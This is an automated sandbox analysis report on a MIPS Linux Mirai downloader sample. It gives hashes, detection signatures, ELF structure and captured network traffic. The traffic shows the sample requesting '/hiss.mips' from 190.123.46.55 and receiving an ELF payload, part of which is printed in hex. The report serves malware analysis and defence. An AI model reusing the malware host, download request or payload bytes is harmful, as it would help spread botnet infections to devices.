Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.mips.elf

Overview

General Information

Sample name:dlr.mips.elf
Analysis ID:1546737
MD5:87cf97359604746cbca018ba33cf8bfc
SHA1:d07ad880b56cf29da33a36aa9533d24c022a0cfd
SHA256:a5c044028e5b2aa2cb837419dba772124ac293529251089727ddde63c6745dec
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1546737
Start date and time:2024-11-01 15:05:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.mips.elf
Detection:MAL
Classification:mal48.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.mips.elf
Command:/tmp/dlr.mips.elf
PID:5843
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
RAWR
:3
Standard Error:
  • system is lnxubuntu20
  • dlr.mips.elf (PID: 5843, Parent: 5767, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/dlr.mips.elf
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: dlr.mips.elfReversingLabs: Detection: 21%
Source: dvrHelper.12.drString: W|||self(deleted)/dev/usr//bin//sbin//cmdlinewgetcurlftp
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknownTCP traffic detected without corresponding DNS query: 190.123.46.55
Source: global trafficHTTP traffic detected: GET /hiss.mips HTTP/1.0User-Agent: Wget
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/1@0/0
Source: /tmp/dlr.mips.elf (PID: 5843)File written: /tmp/dvrHelperJump to dropped file
Source: /tmp/dlr.mips.elf (PID: 5843)Queries kernel information via 'uname': Jump to behavior
Source: dlr.mips.elf, 5843.1.0000558fad56d000.0000558fad5f4000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
Source: dlr.mips.elf, 5843.1.0000558fad56d000.0000558fad5f4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: dlr.mips.elf, 5843.1.00007ffd05914000.00007ffd05935000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
Source: dlr.mips.elf, 5843.1.00007ffd05914000.00007ffd05935000.rw-.sdmpBinary or memory string: ax86_64/usr/bin/qemu-mips/tmp/dlr.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mips.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
dlr.mips.elf21%ReversingLabsLinux.Downloader.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
190.123.46.55
unknownPanama
265540ALTANREDESSAPIdeCVMXfalse
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
ALTANREDESSAPIdeCVMXdlr.arm5.elfGet hashmaliciousUnknownBrowse
  • 190.123.46.21
bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
  • 190.123.46.52
bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
  • 190.123.46.52
bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
  • 190.123.46.52
No context
No context
Process:/tmp/dlr.mips.elf
File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category:dropped
Size (bytes):114228
Entropy (8bit):5.36111521725104
Encrypted:false
SSDEEP:1536:7vlL8oK5rrVanJfhHuvJ+QQtf4tUpLuuhLh+TJXtBLL5/FQMqnDs8M9x3o:V8F5rrcnJfhHuvJJuuuph+DFAs8Qdo
MD5:3F3C1B5F304F85A8DD1AEA1DD763E55B
SHA1:9648526FCFF3ED1F643A5E20109CF8154C419F35
SHA-256:89A366C68EFD8BA39C85295A3428E2CE67CDF5EFD7A1A430123B80FBDF528388
SHA-512:9C9E3AA06F493021034CFB588C5058CA5DCB845F797E4F970A7D521DF0EF0074B9336173D176251C5AEC3F7D3FE069EDE427C98470B8CFA7BD008917B0ED18A7
Malicious:false
Reputation:low
Preview:.ELF.....................@.....4...<.....4. ...(....p........@...@...........................@...@...........................E...E.....T..NP........dt.Q.................................................F.@<...'..t...!'.....................<...'..P...!........'9... ......................<...'.. ...!... ....'9p`. ..........................'.. ........<...'......!'..... .....................".`.....@.................P.....Y....... ..$B... .....P...P.....Y....... ..$B.....H.....@..$..........H..... ..$.......$....".`... ............'..(<...'..$...!'..................@..................$.... ..$..d.........................@............... ..$........ ..'.. ............'.. ...........!........<...'......!...!...T....'...$......$'.............................|..... ..........................<...'.. ...!'........................ ..........&.......&.......&............@.!........$B......&.......................'.. <...'......!'.....0...,...(...$... ...............D...!..... .....!....
File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):4.789405361037801
TrID:
  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:dlr.mips.elf
File size:2'080 bytes
MD5:87cf97359604746cbca018ba33cf8bfc
SHA1:d07ad880b56cf29da33a36aa9533d24c022a0cfd
SHA256:a5c044028e5b2aa2cb837419dba772124ac293529251089727ddde63c6745dec
SHA512:80cdec0ce9a4a4fbc9c8bd1bfb2bcfe06c186903d0f298eb1cdbdf05591c5d82c9583aedca73e1df16a52e6ca28ab177567ac4569168dacc87aca134db03e323
SSDEEP:48:ZzJmYdYQfi9bY1dHfu4qJ/EYEBD3WlrBZ4rmWy31:lJme69b3/EYEBDWlrBUo1
TLSH:CD41CFCE1B759EF4F499D53847334B356A9A550803D44246E1ECE9101FD034D859FBE9
File Content Preview:.ELF.....................@.....4.........4. ...(.............@...@.....x...x.................D...D.....T...p........dt.Q........................................0...0........G.%..&.0....D.%..2......F.%<...'......!...\..(!. ..$...<...'......!...\..(!. ..$..

ELF header

Class:ELF32
Data:2's complement, big endian
Version:1 (current)
Machine:MIPS R3000
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x4004f8
Flags:0x1007
ELF Header Size:52
Program Header Offset:52
Program Header Size:32
Number of Program Headers:3
Section Header Offset:1800
Section Header Size:40
Number of Section Headers:7
Header String Table Index:6
NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
NULL0x00x00x00x00x0000
.textPROGBITS0x4000a00xa00x5800x00x6AX0016
.rodataPROGBITS0x4006200x6200x580x10x32AMS004
.gotPROGBITS0x4406800x6800x540x40x10000003WAp0016
.bssNOBITS0x4406e00x6d40x100x00x3WA0016
.mdebug.abi32PROGBITS0x360x6d40x00x00x0001
.shstrtabSTRTAB0x00x6d40x310x00x0001
TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
LOAD0x00x4000000x4000000x6780x6785.12690x5R E0x10000.text .rodata
LOAD0x6800x4406800x4406800x540x702.41860x6RW 0x10000.got .bss
GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
TimestampSource PortDest PortSource IPDest IP
Nov 1, 2024 15:06:19.565557957 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:19.570431948 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:19.570487976 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:19.571491957 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:19.576308966 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328572989 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328682899 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328701973 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328716040 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328727961 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328763962 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328763962 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328764915 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328885078 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328896999 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328907967 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328918934 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.328932047 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328932047 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328958035 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.328958035 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.329041958 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.329061031 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.329083920 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.329098940 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.334961891 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.335000038 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.335103989 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.335115910 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.335149050 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.335149050 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.447140932 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.447169065 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.447191000 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.447235107 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.480254889 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480292082 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480293036 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.480305910 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480317116 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480542898 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480566978 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480577946 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480649948 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.480663061 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481477976 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481549978 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481561899 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481574059 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481585026 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.481676102 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.482141018 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482161999 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482173920 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482184887 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482791901 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482803106 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482814074 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482825041 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.482836008 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.483577013 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.483890057 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.599545002 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.599688053 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.599698067 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.599709034 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.599726915 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.599737883 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600065947 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600085020 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600095034 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600372076 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600413084 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600425959 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600492954 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600506067 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.600517035 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601260900 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601277113 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601288080 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601300955 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601304054 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.601313114 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601325989 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.601337910 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.602055073 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.602065086 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.602076054 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.603559017 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.606462955 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.606529951 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.608237982 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.726512909 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.731379032 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731448889 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731462002 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731473923 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731484890 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731497049 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731508017 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731873035 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731982946 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.731996059 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732007980 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732018948 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732031107 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732043982 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732098103 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.732692003 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.732734919 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.733917952 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.737473011 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.737487078 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.737498045 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.737592936 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:20.953058958 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:20.953105927 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.012587070 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.017960072 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018055916 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018066883 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018080950 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018091917 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018100977 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018111944 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018397093 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018438101 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018472910 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018559933 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018569946 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018580914 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018589973 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.018599033 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.019996881 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.241064072 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.241110086 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.307811022 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.312693119 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.312706947 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.312736988 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:21.312977076 CET8051814190.123.46.55192.168.2.15
Nov 1, 2024 15:06:21.313633919 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:22.526515007 CET5181480192.168.2.15190.123.46.55
Nov 1, 2024 15:06:22.531444073 CET8051814190.123.46.55192.168.2.15
Session IDSource IPSource PortDestination IPDestination Port
0192.168.2.1551814190.123.46.5580
TimestampBytes transferredDirectionData
Nov 1, 2024 15:06:19.571491957 CET57OUTGET /hiss.mips HTTP/1.0
User-Agent: Wget
Nov 1, 2024 15:06:20.328572989 CET620INHTTP/1.0 200 OK
Date: Fri, 01 Nov 2024 14:06:20 GMT
Content-Type: application/octet-stream
Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 b0 00 00 00 34 00 01 bb 3c 00 00 10 07 00 34 00 20 00 04 00 28 00 13 00 12 70 00 00 00 00 00 00 b4 00 40 00 b4 00 40 00 b4 00 00 00 18 00 00 00 18 00 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 8c e8 00 01 8c e8 00 00 00 05 00 01 00 00 00 00 00 01 00 01 90 00 00 45 90 00 00 45 90 00 00 00 08 54 00 00 4e 50 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 13 40 3c 1c 00 06 27 9c 12 74 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 12 50 03 9f e0 21 8f 99 80 1c 00 00 00 00 27 39 02 1c 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 12 20 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 70 60 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 [TRUNCATED]
Data Ascii: ELF@4<4 (p@@@@EETNPdtQF@<'t!'<'P!'9 <' ! '9p` ' <'!' "`@PY $B PPY $BH@$H $
Nov 1, 2024 15:06:20.328701973 CET1236INData Raw: 24 02 00 01 a2 22 98 60 8f bf 00 20 8f b1 00 1c 8f b0 00 18 03 e0 00 08 27 bd 00 28 3c 1c 00 06 27 9c 11 24 03 99 e0 21 27 bd ff e0 af bf 00 18 af bc 00 10 8f 82 80 bc 00 00 00 00 10 40 00 09 00 00 00 00 8f 84 80 18 8f 85 80 18 8f 99 80 bc 24 84
Data Ascii: $"` '(<'$!'@$ $d@ $ ' ' !<'!!T'$$'
Nov 1, 2024 15:06:20.328716040 CET1236INData Raw: 8e 24 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 00 00 00 00 8f 99 84 20 10 00 ff ed 24 04 00 01 8f 99 81 6c 00 00 00 00 03 20 f8 09 00 00 20 21 3c 1c 00 06 27 9c 0c 48 03 99 e0 21 27 bd ff d8 af bf 00 24 af b0 00 20 af bc 00 10 8f 99 84 24 00 80
Data Ascii: $ $l !<'H!'$ $! $$ ' !@(! $@@H $$ $'(H $$ !'(<'
Nov 1, 2024 15:06:20.328727961 CET1236INData Raw: 8f 99 84 18 27 c3 00 48 af d9 00 d0 8f 99 80 c8 8f 95 84 f4 af d9 00 d4 8f 99 83 0c af c2 00 dc af d9 00 d8 8f 99 84 d4 af c3 00 e4 af d9 00 e0 8f 99 84 14 27 c2 00 28 af d9 00 ec 8f 99 84 20 27 c3 00 2c 03 20 b8 21 8f 99 80 b4 00 00 90 21 af d9
Data Ascii: 'H'( ', !!!'0'$$ 0!@@ !$ $$8<8@ D<4cCdd!e<
Nov 1, 2024 15:06:20.328885078 CET1236INData Raw: 03 20 f8 09 af a2 00 20 8f bc 00 10 00 00 00 00 8f 99 82 b0 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 10 04 40 00 2b 00 00 00 00 14 40 00 23 24 04 00 02 8f 99 84 18 24 05 00 02 03 20 f8 09 00 00 30 21 8f bc 00 10 04 40 00 18 00 40 80 21 97 a3
Data Ascii: @+@#$$ 0!@@!T$> ! <@ !'< $AK(! !l $ $ 4
Nov 1, 2024 15:06:20.328896999 CET1236INData Raw: af b7 00 74 af b6 00 70 af b5 00 6c af b4 00 68 af b3 00 64 af b2 00 60 af b1 00 5c af b0 00 58 af bc 00 18 8f 99 82 34 af a4 00 80 03 20 f8 09 00 00 20 21 8f bc 00 18 00 40 a0 21 8f 99 80 cc 8f 83 80 20 af b9 00 54 8f 99 83 c8 8f 92 84 f4 af b9
Data Ascii: tplhd`\X4 !@! T,' 0wqd4!8T&P<&Q@4(D @!HLP !4 !$B@$BP
Nov 1, 2024 15:06:20.328907967 CET1236INData Raw: 8f 99 80 b4 00 00 00 00 03 20 f8 09 27 b0 00 18 8f bc 00 10 00 00 00 00 8f 99 80 b4 00 00 00 00 03 20 f8 09 24 04 00 02 8f bc 00 10 00 00 00 00 8f 99 84 c8 00 00 00 00 03 20 f8 09 02 00 20 21 8f bc 00 10 02 00 20 21 8f 99 83 e8 00 00 00 00 03 20
Data Ascii: ' $ ! ! $0!(! $$ $$ $$ $$ $$ $
Nov 1, 2024 15:06:20.328918934 CET1236INData Raw: 8f bc 00 10 10 50 00 1b 00 00 00 00 14 40 00 28 00 00 00 00 8f 99 84 20 00 00 00 00 03 20 f8 09 02 40 20 21 8f bc 00 10 00 00 00 00 8f 99 80 b8 00 00 00 00 03 20 f8 09 02 20 20 21 8f bc 00 10 00 00 00 00 8f 99 82 38 00 00 00 00 03 20 f8 09 00 00
Data Ascii: P@( @ ! !8 @ !p $l !840,($ '@FtCdS(!$
Nov 1, 2024 15:06:20.329041958 CET1236INData Raw: af a0 00 2c 10 80 ff a9 00 00 00 00 90 62 00 00 10 a0 ff a6 a2 02 00 04 90 71 00 01 00 00 00 00 02 b1 10 2a 14 40 ff a1 00 00 00 00 8f b9 00 38 26 24 00 01 03 20 f8 09 24 05 00 01 00 40 20 21 8f bc 00 20 ae 02 00 00 8f a2 00 2c 8f b0 00 28 24 42
Data Ascii: ,bq*@8&$ $@ ! ,($B&<@(!,( 0!, #2! $$rS$<'0!',($ !0$ $%tD
